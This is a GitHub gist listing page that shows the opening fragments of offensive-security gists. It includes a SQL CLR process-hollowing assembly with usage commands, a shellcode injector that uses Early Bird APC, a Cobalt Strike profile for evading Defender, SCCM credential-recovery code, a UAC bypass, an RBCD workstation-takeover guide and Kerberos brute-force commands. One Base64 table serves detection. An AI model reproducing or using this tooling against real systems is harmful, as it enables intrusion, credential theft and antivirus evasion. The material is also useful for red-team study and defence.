Skip to content

Instantly share code, notes, and snippets.

View th3k3ymak3r's full-sized avatar

th3k3ymak3r th3k3ymak3r

21 followers · 28 following
  • The Matrix
View GitHub Profile
@andyrobbins
andyrobbins / DiscoverT0SPs.ps1
Created April 5, 2022 01:07
# Function for getting an MS Graph Token
Function Get-MSGraphToken {
<#
.DESCRIPTION
Requests a token from STS with the MS Graph specified as the resource/intended audience
#>
[cmdletbinding()]
param(
[Parameter(Mandatory = $True)]
[string]
@skahwah
skahwah / hollow.cs
Last active March 20, 2024 07:55
Custom assembly that is compatible with SQL CLR attacks.
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
@rxwx
rxwx / loadBundle.js
Last active December 18, 2024 01:45
Mach-O Loader in Node.js (work in progress)
const ffi = require('ffi-napi');
const ref = require("ref-napi");
const Struct = require("ref-struct-di")(ref);
const fs = require('fs')
const ArrayType = require('ref-array-napi')
var Union = require('ref-union-napi');
/*
Dependencies:
$ npm install ffi-napi
@EvanMcBroom
EvanMcBroom / sms-crypto-unobfuscate-string.c
Last active January 24, 2024 23:48
SCCM Credential Recovery for Network Access Accounts
/*
* Research by Evan McBroom and Chris Thompson (@_Mayyhem)
* Roger Zander made security recommendations for SCCM based on the claim that NAA credentials could be recovered.
* Source: https://rzander.azurewebsites.net/network-access-accounts-are-evil/
* Roger stated that recover was "possible with a few lines of code" but did not provide any code. Here is working code.
*/
#include <Windows.h>
#include <stdio.h>
@mhaskar
mhaskar / client-ipv6-generic.c
Created January 24, 2022 00:09
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
#include <stdint.h>
#include <inttypes.h>
#include <winsock2.h>
#include <windns.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2025 09:08
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active April 13, 2026 08:47
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" &lt;. Often used by Emotet (UTF-16)
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: